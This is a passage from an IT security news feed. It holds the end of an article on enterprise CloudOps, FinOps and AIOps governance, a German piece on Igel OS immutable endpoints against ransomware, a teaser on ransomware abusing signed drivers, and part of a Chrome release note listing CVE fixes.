<p>AIOps gives the framework its intelligence and response speed. In most enterprises, operations data is noisy, fragmented and too voluminous for humans to interpret quickly during incidents or performance degradation. AIOps platforms reduce that burden by correlating events, identifying anomalies, clustering symptoms, surfacing probable root causes and recommending or initiating remediation actions. The best outcomes appear when AIOps is connected not only to infrastructure monitoring but also to service maps, change records, configuration data, incident workflows and business priorities.</p>



<p>That connection allows the enterprise to distinguish between a harmless signal fluctuation and an issue that threatens a critical business service. Forrester’s 2024 <a href="https://www.forrester.com/report/the-state-of-aiops-and-observability/RES180470" rel="nofollow">research</a> on AIOps and observability explains this well by describing the complementary value of breadth and depth: observability provides richer technical insight, while AIOps helps transform those signals into operational action. In practice, autonomy grows when low-risk responses such as service restarts, resource adjustments, ticket enrichment, dependency checks or rollback decisions are automated under policy. High-risk actions should remain human-approved until confidence improves. Over time, the enterprise can move from reactive incident management to predictive operations, where emerging capacity risk, recurring error patterns or unusual AI workload behavior are addressed before service impact is visible to users.</p>



<h2 class="wp-block-heading">How the framework leads to operational excellence</h2>



<p>Operational excellence is the cumulative result of better decisions made earlier, faster and with clearer accountability. A well-designed autonomy framework improves service reliability because systems are observed continuously and remediation can be triggered before failures spread. It improves cost discipline because consumption anomalies are identified at the same time as performance or usage anomalies, not weeks later in a billing report.</p>



<p>It improves strategic focus because technology leaders can evaluate trade-offs in terms of business value rather than technical activity alone. It also improves employee productivity by removing repetitive operational effort and shifting skilled staff toward engineering improvements, policy tuning and service innovation. The most important outcome, however, is predictability. Enterprises become more confident in how they scale AI services, how they control cloud spend, how they handle operational events and how they meet compliance obligations. That confidence is what separates routine automation from genuine operational autonomy.</p>



<h2 class="wp-block-heading">Security, governance, process implementation and people upskilling</h2>



<p>No autonomy framework survives without strong security and governance. Automated operations amplify both efficiency and risk, which means identity controls, segmentation, least-privilege access, secrets management, encryption and auditability have to be embedded from the start. AI services add further concerns: prompt leakage, data residency, model misuse, training-data exposure, shadow AI adoption and uncontrolled access to external models.</p>



<p>Governance therefore needs to extend across cloud resources, operational workflows, AI services and data assets. Enterprises should establish clear policy domains covering infrastructure provisioning, AI model approval, token limits, vendor usage, observability data handling, retention rules, access reviews and exception management. Process implementation is equally important. The framework should define standard operating patterns for incident triage, automated remediation approval, cost anomaly review, model lifecycle management and post-incident learning. None of this works unless people are prepared for the shift.</p>



<p>Operations teams need skills in cloud economics, observability, automation engineering and policy-driven operations. Finance teams need to understand cloud and AI consumption models. Security and privacy teams need fluency in AI risk scenarios and control design. Business leaders need a clearer grasp of unit economics and value realization. IDC’s 2024 <a href="https://www.intel.com/content/dam/www/central-libraries/us/en/documents/2024-03/idc-ai-strategy-in-2024-growth-roi-security-brief.pdf" rel="nofollow">briefing</a> on enterprise AI strategy highlights the tension between rapid AI investment, ROI pressure, staffing constraints, security and compliance. That is exactly why upskilling must be treated as part of the framework itself, not as an optional change-management activity as per FinOps Foundation <a href="https://www.finops.org/wg/finops-for-ai-overview/" rel="nofollow">documentation</a>.</p>



<h2 class="wp-block-heading">The role of regulatory compliance</h2>



<p>Regulatory compliance is not a side topic in operational autonomy; it is one of the main reasons the framework must be formalized. Cloud environments frequently span jurisdictions, AI systems process sensitive information, observability platforms collect detailed operational data and automated decisions may influence customer experience or internal controls. Regulations such as GDPR, DPDP, sector-specific cybersecurity directives, financial reporting obligations, contractual data-handling requirements and internal audit standards all shape what autonomy can and cannot do.</p>



<p>Compliance requirements should therefore be translated into operational policy. Examples include residency-aware workload placement, data minimization in logs and prompts, access segregation for financial and regulated data, explainable automated actions, evidence retention, periodic control attestations and approval workflows for AI usage involving personal or confidential information. Chief privacy and data leaders play a central role here because the compliance question is no longer just where data is stored, but also how data is observed, transformed and consumed by AI-driven services. A mature framework reduces compliance risk by making control enforcement systematic rather than dependent on manual effort.</p>



<h2 class="wp-block-heading">How to implement the framework in practice</h2>



<p>Implementation is usually most successful when handled in phases. The first phase is baseline visibility: consolidate telemetry, cloud billing data, service inventory, AI usage data and business ownership into one operational picture. The second phase is governance design: define policies for tagging, spend thresholds, automation boundaries, access controls, model usage and compliance checkpoints.</p>



<p>The third phase is prioritization: choose a small number of use cases where autonomy can produce measurable value, such as cloud rightsizing, incident correlation, cost anomaly detection, AI token governance or automated remediation for recurring low-risk faults. The fourth phase is automation with guardrails: deploy workflows, approval rules and rollback paths. The fifth phase is optimization and learning: review outcomes, refine policies, update unit economics, expand autonomy coverage and measure business impact.</p>



<p>This staged approach matters because full autonomy is not achieved by switching on one platform. It is built progressively through trusted control, good data and disciplined execution.</p>



<h2 class="wp-block-heading">Useful tools for building the framework</h2>



<p>The tool landscape should be chosen based on architecture, governance maturity and operating model rather than vendor popularity alone. Cloud-native cost and operations tools from hyperscalers provide baseline visibility, but many enterprises supplement them with specialized FinOps platforms for allocation, forecasting, commitment analysis and chargeback. Observability platforms help unify metrics, logs, traces and service maps, while AIOps platforms add anomaly detection, event correlation and automation orchestration.</p>



<p>Service management platforms remain important for change control, incident workflows and audit evidence. AI gateways and model management layers are increasingly useful for token monitoring, policy enforcement, prompt controls, model routing and usage analytics. Security posture management, DSPM, identity governance and compliance automation tools also become part of the architecture because autonomy without trust quickly becomes fragile. The most effective toolchains are the ones that integrate technical telemetry, financial signals, governance policy and workflow automation into a coherent operating system for the enterprise.</p>



<h2 class="wp-block-heading">Executive roles in developing and managing the framework</h2>



<p>Here is a table that summarizes various Executive Roles and their responsibilities in Operational Autonomy governance.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Executive Role</strong></td><td><strong>Primary Responsibility in the Framework</strong></td><td><strong>Key Decisions and Governance Focus</strong></td></tr><tr><td>CIO</td><td>Owns the enterprise operating model and ensures CloudOps, FinOps and AIOps are aligned to business service outcomes.</td><td>Sets operating priorities, funds enabling platforms, establishes accountability, sponsors service reliability and cost transparency programs, and chairs cross-functional governance.</td></tr><tr><td>CTO</td><td>Defines the target architecture for autonomy, including cloud platforms, observability, automation, AI services and integration patterns.</td><td>Approves technical standards, automation design principles, platform engineering choices, model architecture strategy and engineering guardrails for scale and resilience.</td></tr><tr><td>Chief Privacy Officer</td><td>Ensures that data use in observability, automation and AI operations complies with privacy law and internal policy.</td><td>Defines controls for personal data handling, retention, consent boundaries, cross-border transfer considerations, prompt and log privacy, and privacy impact assessments.</td></tr><tr><td>Chief Data Officer</td><td>Leads data governance, data quality, metadata management and trustworthy access to the shared operational data layer.</td><td>Defines data classification, stewardship, lineage expectations, AI data usage standards and interoperability rules required for accurate autonomous decision-making.</td></tr><tr><td>Chief Strategy Officer</td><td>Connects the autonomy framework to enterprise transformation goals, investment priorities and measurable business value.</td><td>Shapes business case design, prioritizes value pools, aligns the framework with growth and efficiency strategy, and ensures operating metrics support executive decision-making.</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Developing operational autonomy for an enterprise is not about chasing a futuristic ideal. It is about building a disciplined and connected operating model that helps the organization run technology with greater confidence, speed and accountability. CloudOps keeps the estate reliable, FinOps ensures that spending reflects value, AIOps makes complexity manageable and AI cost governance brings much-needed control to token-driven consumption. Security, privacy, compliance, process rigor and people capability are what make the framework sustainable. When all of these parts work together, the enterprise does not just automate tasks; it strengthens resilience, improves financial stewardship and creates a more adaptive path to operational excellence.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Igel Ransomware die Stacheln zeigt]]></title>
<description><![CDATA[width="1484" height="811" sizes="auto, (max-width: 1484px) 100vw, 1484px">Statt eigener Hardware setzt Igel Technologies auf Thin Clients von Partnern wie HP, Lenovo oder LG (Bild) und konzentriert sich auf Igel OS.   LG



Oft liefern kompromittierte Endgeräte die lediglich angelehnte Hintertür,...]]></description>
<link>https://tsecurity.de/de/3637769/it-security-nachrichten/wie-igel-ransomware-die-stacheln-zeigt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637769/it-security-nachrichten/wie-igel-ransomware-die-stacheln-zeigt/</guid>
<pubDate>Wed, 01 Jul 2026 09:53:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> width="1484" height="811" sizes="auto, (max-width: 1484px) 100vw, 1484px"&gt;<figcaption class="wp-element-caption">Statt eigener Hardware setzt Igel Technologies auf Thin Clients von Partnern wie HP, Lenovo oder LG (Bild) und konzentriert sich auf Igel OS.   </figcaption></figure><p class="imageCredit">LG</p></div>



<p>Oft liefern kompromittierte Endgeräte die lediglich angelehnte Hintertür, durch die Ransomware ins Unternehmen schlüpft. Gartner-Analysten raten deshalb zu unveränderbaren Endpunkten. Igel Technology liefert dafür eine solche Architektur – und neuerdings zudem schnelle Hilfestellung für gekaperte Windows-Clients.</p>



<p>Das Bremer Unternehmen behauptete sich einst im Bereich Thin Clients gegen Größen wie HP und Dell, Ende 2022 verkündete Igel dann, keine TCs mehr zu produzieren, sondern Hardware von Partnern wie HP, Lenovo und LG zu nutzen.</p>



<p>Denn Igel hatte erkannt: Die eigentliche Stärke liegt im angriffsresistenten, weil stark abschottbaren Linux-Betriebssystem Igel OS samt zentraler Verwaltung per zugehöriger Universal Management Suite (UMS). Seither arbeitete das Unternehmen, ab 2023 unter der Führung des in den USA lebenden Dänen Oestermann, daran zum zum Anbieter einer, so Igel, „Adaptive Secure Endpoint Platform“ zu werden. Diese Plattform setzt, so eine weitere Igel-Formulierung, das „Preventative Security Model“ um, soll also Kompromittierung a priori verhindern.</p>



<h2 class="wp-block-heading">Igels erweiterbare Endpunkt-Plattform</h2>



<p>Hierfür ist das Igel OS in schönster Thin-Client-Tradition auf das Nötigste reduziert, gehärtet und somit hochgradig manipulationsresistent. In Kombination mit rein serverseitiger Datenhaltung scheint dies heute nützlicher denn je. Denn Ransomware-Angriffe haben sich, wie einst die Kaninchen in Australien, zur regelrechten Landplage entwickelt. Und Security-Fachleute <a href="https://www.computerwoche.de/article/4137800/ki-macht-kaputt.html">warnen</a> <a href="https://www.trendmicro.com/de_de/research/26/f/apt-bericht-2025-ki-veraendert-strategien.html">allerorts</a>, dass Cyberkriminelle verstärkt KI nutzen, um ihre Angriffe weiter zu automatisieren, zu skalieren und zu beschleunigen.</p>



<p>Die Analysten von Gartner bestätigen die neue Strategie von Igel. „Endpunkte sind die am stärksten fragmentierte, poröse Oberfläche einer Organisation“, schreiben die Marktforscher in einem <a href="https://www.gartner.com/en/documents/7524653" target="_blank" rel="noreferrer noopener">Papier</a> vom Februar 2026, dessen Titel auch gleich einen Ausweg weist: „Nutzen Sie unveränderbare Endpunkte, um Ransomware zu besiegen, Konfigurationsabweichungen zu stoppen und schnelle Wiederherstellung zu garantieren“. Denn „veränderliche, agentenlastige Endpunkte“ – vulgo Windows-PCs – seien das Haupteinfallstor für Angriffe, so die Analysten.</p>



<p>Unveränderliche Endpunkte hingegen, so Gartner-Analyst <a href="https://www.gartner.com/en/experts/franz-hinner">Franz Hinner</a> und seine Co-Autoren, könnten die Angriffskette durchbrechen und Persistenz der Angreifer im Netzwerk für langfristige oder wiederholte Angriffe verhindern. Indem sich die Sicherheitskontrollen vom Endgerät auf die Identität verlagerten, so die Marktforscher, ließen sich die Ausfallzeiten der Mitarbeiter um 98 Prozent senken.</p>



<p>Eben dieses Konzept verfolgt Igel mit der „Adaptive Secure Endpoint Platform“, die esüber offene APIs erlaubt, Drittanbieterlösungen zu integrieren. Rund 130 Partner zählt man inzwischen, so die Bremer, darunter Identity-Security-Anbieter wie Okta, Imprivata und Microsoft (mit Entra ID) sowie diverse weitere Security-Größen, mit deren Hilfe Igel Zero-Trust-Architekturen umzusetzen kann.</p>



<p>Doch Igel verlässt sich längst nicht nur auf seine Partner: Auch das hauseigene Entwicklungsteam unter der Leitung von General Manager und CTO Matthias Haas treibt die Softwareentwicklung eifrig voran. Hierfür unterhält Igel heute neben dem Stamm-Entwicklungsstandort Augsburg weitere in Bukarest, Bangalore und Fort Lauderdale, USA. Federführend ist jedoch weiterhin die deutsche Lokation.</p>



<p>Bei einer <a href="https://www.igel.de/nowandnext/" target="_blank" rel="noreferrer noopener">Kundenveranstaltung in Frankfurt</a> präsentierte Igel kürzlich zahlreiche Erweiterungen seiner Plattform. Hierzu zählen unter anderem:</p>



<ul class="wp-block-list">
<li>kontextbezogene Zugriffskontrollen, ermöglicht durch die Kooperation mit Security-Partnern;</li>



<li>ein Managed Hypervisor inklusive der Option, auf den TCs Published Apps lokal laufen zu lassen;</li>



<li>Managed Container (wichtig für das Industrieumfeld);</li>



<li>Unterstützung für ARM-Prozessoren.</li>
</ul>



<p>Und natürlich darf das Thema KI nicht fehlen: Igel AI Armor soll die KI-Nutzung absichern, MCP-Support sei hierfür in Arbeit.</p>



<p>Eine pfiffige Lösung ist „Igel Business Continuity &amp; Disaster Recovery“. Die Funktionsweise: Ein Windows-Endpunkt läuft virtualisiert auf Igel OS. Im Notfall, etwa bei einem Ransomware-Angriff, müssen die Anwender nur die F9-Taste drücken. Dies führt zum Neustart samt Auswahl, ob man den Windows-Rechner oder das abgesicherte Igel OS starten möchte. Neben diesem Dual Boot gibt es, etwa für Industrie-PCs, auch eine USB-Boot-Option.</p>



<p>Dadurch, so Igel, seien Unternehmen in Minuten wieder arbeitsfähig. Oder konkret ausgedrückt: Anwender können gehostete und SaaS-Applikationen wie Windows 365 weiter nutzen und bleiben damit zumindest im Kern handlungsfähig. Das Windows-OS liegt dabei für Forensik-Zwecke weiterhin unangetastet vor. Die Lösung erweist sich laut CEO <a href="https://www.linkedin.com/in/klausoestermann">Klaus Oestermann</a> als „Türöffner“ für die Neukundengewinnung, ebenso beim Ausbau bestehender Installationen.</p>



<h2 class="wp-block-heading">Igel-Vorteile für Kliniken und die Industrie</h2>



<p>Wie Igel anhand mehrerer Kundenszenarien veranschaulichte, bieten unveränderliche, zentral verwaltete Endpunkte auch jenseits von Malware-Schutz und Resilienz im Angriffsfall Vorteile.</p>



<p>So brauchten die PCs des britischen NHS Gloustershire Hospitals früher laut Igel-Angaben 30 Minuten bis zum erfolgten Login. Mitarbeiter riefen deshalb vom Arbeitsweg aus an und baten einen Kollegen, sie mit ihrem Passwort einzuloggen, damit sie bei Ankunft schnell arbeitsfähig sind – das Gegenteil von Nutzerfreundlichkeit und ein Alptraum für jeden CISO.</p>



<p>Mit Igel OS und der Access-Management-Lösung Imprivata dauere der Login nun nur noch eine Minute, berichteten die Bremer, ein erneuter Login wenige Sekunden. Ein Arzt auf Visite müsse sich also nicht mehr minutenlang vom Patienten abwenden, um mit dem PC zu kämpfen, sondern könne sich schnell wieder der Behandlung widmen.</p>



<p>Hierzulande setzen laut Peter Goldbrunner, Vice President und General Manager Central Europe bei Igel, rund 300 Kliniken auf Igel OS. Auch sonst wachse das Geschäft in Deutschland ebenso schnell wie das internationale Business – und das vom hohen Niveau des Stammlandes aus betrachtet.</p>



<p>So betreibe nun etwa Aldi Nord die Steuerung der Backautomaten in seinen Filialen mittels zentral verwalteter Igel-OS-Endpunkte. In der Industrie wiederum, so Goldbrunner, nutze beispielsweise Audi inzwischen Steuerungsrechner mancher Produktionsanlagen virtualisiert auf Igel-OS-Endpunkten statt wie bislang Industrie-PCs. Damit sollen sich die Industriesteuerungen selbst dann zügig weiterbetreiben lassen, wenn wie letztes Jahr bei <a href="https://www.tagesschau.de/wirtschaft/unternehmen/jaguar-cyberangriff-100.html">Jaguar Land Rover</a> Cyberangreifer zuschlagen sollten – ohne dass ein Techniker vor Ort eingreifen muss.</p>



<p>Laut <a href="https://www.linkedin.com/in/epirker">Emanuel Pirker</a>, Ex-Chef des 2025 von Igel akquirierten TC-Herstellers Stratodesk und nun verantwortlich für den Contact-Center-Bereich, können Igel-OS-Endpunkte im Call- oder Contact-Center die Kosten deutlich senken. Das Onboarding neuer Mitarbeiter sei in fünf Minuten erledigt – wichtig in einer Branche mit extrem hoher Personalfluktuation. Datensicherheit und Compliance seien gewahrt, da keine Daten auf den Endpunkten gespeichert werden. Zudem sinken laut Pirker die Betriebskosten durch längere Hardware-Lebenszyklen, weniger Update-Bedarf und einfacheres Management. UMS ist hierfür auf Wunsch „as a Service“ erhältlich, auch aus einem Rechenzentrum im EU-Rechtsraum. (mb)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Operators Abuse Signed Windows Drivers to Disable Security Software]]></title>
<description><![CDATA[Defense evasion has quietly become one of the most consequential stages of advanced cyber intrusions. As endpoint protections have grown harder to bypass, attackers stopped trying to hide and started switching defenses off. In many modern ransomware attacks, disabling antivirus (AV) and endpoint ...]]></description>
<link>https://tsecurity.de/de/3637543/it-security-nachrichten/ransomware-operators-abuse-signed-windows-drivers-to-disable-security-software/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637543/it-security-nachrichten/ransomware-operators-abuse-signed-windows-drivers-to-disable-security-software/</guid>
<pubDate>Wed, 01 Jul 2026 08:07:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Defense evasion has quietly become one of the most consequential stages of advanced cyber intrusions. As endpoint protections have grown harder to bypass, attackers stopped trying to hide and started switching defenses off. In many modern ransomware attacks, disabling antivirus (AV) and endpoint detection and response (EDR) agents is now a standard step. A single […]</p>
<p>The post <a href="https://cyberpress.org/ransomware-abuses-signed-drivers/">Ransomware Operators Abuse Signed Windows Drivers to Disable Security Software</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Chrome team is delighted to announce the promotion of Chrome 151 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks.Chrome 150.0.7871.46 (Linux) 150.0.7871.46/.47 Windows/Mac contains a number of fixes and improvements -- a list of changes is avail...]]></description>
<link>https://tsecurity.de/de/3637049/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637049/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Wed, 01 Jul 2026 01:08:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The Chrome team is delighted to announce the promotion of Chrome 151 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks.</span></p><p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)"><span color="rgba(0, 0, 0, 0.87)"><span color="rgba(0, 0, 0, 0.87)"><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">Chrome </span><span color="rgba(0, 0, 0, 0.87)"><span color="rgba(0, 0, 0, 0.87)">150.0.7871.46 (Linux) </span></span></span></span></span><span color="rgba(0, 0, 0, 0.87)"><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.46/.47 </span><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">Windows/Mac </span></span></span><span><span color="rgba(0, 0, 0, 0.87)">contains a number of fixes and improvements -- a list of changes is available in the</span><a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.201..150.0.7871.47?pretty=fuller&amp;n=10000"> log</a><span color="rgba(0, 0, 0, 0.87)">. Watch out for upcoming</span><a href="https://chrome.blogspot.com/"> </a><a href="https://chrome.blogspot.com/">Chrome</a> </span><span>and</span><a href="https://blog.chromium.org/"> Chromium</a><span> blog posts about new features and big efforts delivered in 151.</span></span></span></span></p><div><span>Security Fixes and Rewards<br></span><span>Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.<br></span><span>This update includes </span><a href="https://issues.chromium.org/issues?q=customfield1223088:0-M150"><span>382</span></a><span> security fixes. Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span>Chrome Security Page</span></a><span> for more information.<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/506558270"><span>506558270</span></a><span>]</span><span> Critical </span><span>CVE-2026-13774: Use after free in Extensions. </span><span>Reported by Google on 2026-04-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511766407"><span>511766407</span></a><span>]</span><span> Critical </span><span>CVE-2026-13775: Use after free in GPU. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513012139"><span>513012139</span></a><span>]</span><span> Critical </span><span>CVE-2026-13776: Type Confusion in Dawn. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513128566"><span>513128566</span></a><span>]</span><span> Critical </span><span>CVE-2026-13777: Insufficient validation of untrusted input in iOSWeb. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513167952"><span>513167952</span></a><span>]</span><span> Critical </span><span>CVE-2026-13778: Use after free in WebUSB. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513222854"><span>513222854</span></a><span>]</span><span> Critical </span><span>CVE-2026-13779: Use after free in Chromoting. </span><span>Reported by Google on 2026-05-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/514769383"><span>514769383</span></a><span>]</span><span> Critical </span><span>CVE-2026-13780: Insufficient validation of untrusted input in ANGLE. </span><span>Reported by Google on 2026-05-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516457532"><span>516457532</span></a><span>]</span><span> Critical </span><span>CVE-2026-13781: Insufficient validation of untrusted input in Skia. </span><span>Reported by Google on 2026-05-25<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516683433"><span>516683433</span></a><span>]</span><span> Critical </span><span>CVE-2026-13782: Use after free in Browser. </span><span>Reported by Google on 2026-05-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516962178"><span>516962178</span></a><span>]</span><span> Critical </span><span>CVE-2026-13783: Use after free in Views. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/516962715"><span>516962715</span></a><span>]</span><span> Critical </span><span>CVE-2026-13784: Use after free in Views. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/517021684"><span>517021684</span></a><span>]</span><span> Critical </span><span>CVE-2026-13785: Use after free in Bluetooth. </span><span>Reported by Google on 2026-05-27<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/518007821"><span>518007821</span></a><span>]</span><span> Critical </span><span>CVE-2026-13786: Use after free in Ozone. </span><span>Reported by Google on 2026-05-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/522919313"><span>522919313</span></a><span>]</span><span> Critical </span><span>CVE-2026-13787: Use after free in Chromoting. </span><span>Reported by Google on 2026-06-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/523119897"><span>523119897</span></a><span>]</span><span> Critical </span><span>CVE-2026-13788: Use after free in Fullscreen. </span><span>Reported by Google on 2026-06-12<br></span><span>[$36000][</span><a href="https://issues.chromium.org/issues/493847920"><span>493847920</span></a><span>]</span><span> High </span><span>CVE-2026-13789: Use after free in GPU. </span><span>Reported by 86ac1f1587b71893ed2ad792cd7dde32 on 2026-03-18<br></span><span>[$10000][</span><a href="https://issues.chromium.org/issues/457771782"><span>457771782</span></a><span>]</span><span> High </span><span>CVE-2026-13790: Side-channel information leakage in Scroll. </span><span>Reported by Vsevolod Kokorin (Slonser) of Solidlab and Jorian Woltjer on 2025-11-04<br></span><span>[$10000][</span><a href="https://issues.chromium.org/issues/503850012"><span>503850012</span></a><span>]</span><span> High </span><span>CVE-2026-13791: Insufficient validation of untrusted input in Downloads. </span><span>Reported by Ron Masas (Imperva) on 2026-04-17<br></span><span>[$4000][</span><a href="https://issues.chromium.org/issues/496012368"><span>496012368</span></a><span>]</span><span> High </span><span>CVE-2026-13792: Use after free in Touchbar. </span><span>Reported by Weipeng Jiang (@Krace) of VRI on 2026-03-25<br></span><span>[$3000][</span><a href="https://issues.chromium.org/issues/510829679"><span>510829679</span></a><span>]</span><span> High </span><span>CVE-2026-13793: Insufficient policy enforcement in SVG. </span><span>Reported by pakhunov.anton.n@gmail.com on 2026-05-07<br></span><span>[$2500][</span><a href="https://issues.chromium.org/issues/513893425"><span>513893425</span></a><span>]</span><span> High </span><span>CVE-2026-13794: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Daniel Rodríguez on 2026-05-16<br></span><span>[$2000][</span><a href="https://issues.chromium.org/issues/476591032"><span>476591032</span></a><span>]</span><span> High </span><span>CVE-2026-13795: Insufficient policy enforcement in Chrome for iOS. </span><span>Reported by maitai on 2026-01-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/491894115"><span>491894115</span></a><span>]</span><span> High </span><span>CVE-2026-13796: Integer overflow in Chromecast. </span><span>Reported by Google on 2026-03-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499025645"><span>499025645</span></a><span>]</span><span> High </span><span>CVE-2026-13797: Insufficient validation of untrusted input in Chromecast. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499048914"><span>499048914</span></a><span>]</span><span> High </span><span>CVE-2026-13798: Heap buffer overflow in Chromecast. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499252371"><span>499252371</span></a><span>]</span><span> High </span><span>CVE-2026-13799: Use after free in QUIC. </span><span>Reported by Google on 2026-04-03<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/500108770"><span>500108770</span></a><span>]</span><span> High </span><span>CVE-2026-13800: Inappropriate implementation in Updater. </span><span>Reported by Google on 2026-04-06</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/500587568"><span>500587568</span></a><span>]</span><span> High </span><span>CVE-2026-13801: Integer overflow in Chromecast. </span><span>Reported by Google on 2026-04-08</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/501623322"><span>501623322</span></a><span>]</span><span> High </span><span>CVE-2026-13802: Use after free in Views. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501669642"><span>501669642</span></a><span>]</span><span> High </span><span>CVE-2026-13803: Type Confusion in Chrome Tabs. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501873032"><span>501873032</span></a><span>]</span><span> High </span><span>CVE-2026-13804: Use after free in Chromecast. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502282040"><span>502282040</span></a><span>]</span><span> High </span><span>CVE-2026-13805: Use after free in GFX. </span><span>Reported by Google on 2026-04-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/503333798"><span>503333798</span></a><span>]</span><span> High </span><span>CVE-2026-13806: Insufficient validation of untrusted input in Accessibility. </span><span>Reported by Google on 2026-04-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504194494"><span>504194494</span></a><span>]</span><span> High </span><span>CVE-2026-13807: Use after free in Import. </span><span>Reported by Google on 2026-04-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504221510"><span>504221510</span></a><span>]</span><span> High </span><span>CVE-2026-13808: Insufficient data validation in Chrome for iOS. </span><span>Reported by Google on 2026-04-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504222227"><span>504222227</span></a><span>]</span><span> High </span><span>CVE-2026-13809: Side-channel information leakage in Safe Browsing. </span><span>eported by Google on 2026-04-19<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/504600482"><span>504600482</span></a><span>]</span><span> High </span><span>CVE-2026-13810: Inappropriate implementation in Input. </span><span>Reported by dilipsc03@gmail.com on 2026-04-20<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/506149253"><span>506149253</span></a><span>]</span><span> High </span><span>CVE-2026-13811: Use after free in IME. </span><span>Reported by Google on 2026-04-24<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508293203"><span>508293203</span></a><span>]</span><span> High </span><span>CVE-2026-13812: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-04-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/508462149"><span>508462149</span></a><span>]</span><span> High </span><span>CVE-2026-13813: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-05-01<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511712766"><span>511712766</span></a><span>]</span><span> High </span><span>CVE-2026-13814: Use after free in Views. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511722207"><span>511722207</span></a><span>]</span><span> High </span><span>CVE-2026-13815: Use after free in Blink. </span><span>Reported by Google on 